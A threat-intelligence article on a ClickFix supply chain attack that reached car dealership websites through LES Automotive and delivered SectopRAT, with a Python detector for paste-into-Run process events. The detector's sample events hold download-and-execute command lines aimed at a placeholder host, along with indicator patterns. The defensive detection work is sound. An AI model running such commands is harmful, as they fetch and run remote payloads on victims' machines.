Recently, over 100 websites belonging to car dealerships were found to serve malicious "ClickFix" code due to a supply chain attack that affected a third-party domain. According to security researcher Randy McEoin, the threat actor infected LES Automotive, a privately held streaming service provider based in Tolland, CT, that primarily focuses on the automotive industry. All websites using LES Automotive's services shared a ClickFix webpage with their visitors. [1]
See: https://redskyalliance.org/xindustry/booking-com-and-clickfix
This is the second major supply chain attack to affect large numbers of dealerships in less than a year. Still, this time the attack involved banks using malicious code displayed on a webpage, prompting the user to fix an error or complete a reCAPTCHA challenge to prove they are human. Once the user clicks the prompt, a malicious command is automatically copied to the clipboard; the user is then instructed to open the Windows Run prompt and paste the copied command into it to execute it. After that, the attacker has access to the target and executes a second-stage payload, which in this case is the SectopRAT malware.
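The chain described above leaves a recognisable trace on the endpoint: whatever the victim pastes into the Run prompt is spawned by the Windows shell (explorer.exe), and the pasted command has to fetch or decode and run the next stage. The following detector is an added example, not code from the article or from Red Sky Alliance; it scans constructed process-creation events (fields named after Sysmon's ParentImage/Image/CommandLine, an assumption about the log source) and flags interpreters launched from explorer.exe whose command line carries download-and-execute indicators. The indicator list and the sample events are assumptions built for the example, not indicators from the incident itself.

```python
"""Flag process-creation events consistent with a ClickFix "paste into Run" chain.

Heuristic (assumed for this example, not taken from the article): a command typed
or pasted into the Windows Run dialog is a child of explorer.exe, and paste-and-run
lures rely on an interpreter or downloader plus remote-fetch / hidden-execution flags.
"""
import re

# Interpreters and downloaders commonly abused by paste-and-run lures (assumed list).
SUSPICIOUS_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe"}

# Named command-line indicators, checked in this order (assumed patterns).
INDICATORS = [
    ("encoded_command", re.compile(r"-(enc|encodedcommand|e)\b", re.I)),
    ("download_cmdlet", re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I)),
    ("iex", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("mshta_remote", re.compile(r"\bmshta\.exe\s+https?://", re.I)),
    ("url", re.compile(r"https?://\S+", re.I)),
]


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list[str]:
    """Return the indicator names hit by one process-creation event ([] if benign).

    Only events whose parent is explorer.exe and whose image is in SUSPICIOUS_IMAGES
    are scored; everything else is treated as out of scope for this heuristic.
    """
    if _basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if _basename(event.get("Image", "")) not in SUSPICIOUS_IMAGES:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, pattern in INDICATORS if pattern.search(cmd)]


def scan(events: list[dict]) -> list[dict]:
    """Return one alert per event that hits at least one indicator."""
    alerts = []
    for event in events:
        hits = score_event(event)
        if hits:
            alerts.append({"ProcessId": event["ProcessId"], "hits": hits})
    return alerts


# Constructed sample events (not real telemetry); lure.example is a placeholder host.
SAMPLE_EVENTS = [
    {   # ClickFix-style paste: hidden PowerShell fetching and executing a remote script
        "ProcessId": 4321,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -w hidden -c "iwr http://lure.example/verify | iex"',
    },
    {   # Variant: mshta pulling a remote HTA straight from the Run prompt
        "ProcessId": 4330,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta.exe https://lure.example/verify.hta",
    },
    {   # Benign: an administrator listing a directory from the Run prompt
        "ProcessId": 4402,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users",
    },
    {   # Out of scope for this heuristic: encoded command, but parent is cmd.exe
        "ProcessId": 4510,
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -enc AAAAAAAA",
    },
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"PID {alert['ProcessId']}: {', '.join(alert['hits'])}")
```

The parent-process constraint is what keeps this rule quiet on a normal fleet: PowerShell with a URL on its command line is common under scheduled tasks and management agents, but rarely under explorer.exe. Tune SUSPICIOUS_IMAGES and INDICATORS to your own telemetry before deploying it as a detection.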
This is not the first time this technique has been used, and likely not the last. In October 2024, GoDaddy, a domain registrar, warned of a variant of malware disguised as a fake browser update called ClickFix that infected over 6,000 WordPress sites in just one day. "These seemingly legitimate plug-ins are designed to appear harmless to website administrators but contain embedded malicious scripts that deliver fake browser update prompts to end users," GoDaddy principal security engineer Denis Sinegubko said at the time.
More recently, on 13 March 2025, Microsoft warned of Storm-1865, a threat actor using ClickFix in attacks primarily targeting the hospitality industry in North America, Oceania, South and Southeast Asia, and all across Europe. Part of the threat actor's campaign involved impersonating Booking.com: sending the user a malicious email pretending to be from the travel company and encouraging them to review their account or a request, or offering a promotion. This was just a front, and the attack chain ultimately led to a malicious payload being downloaded.
This article is shared at no charge and is for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
© 2025 Red Sky Alliance Corporation. All rights reserved.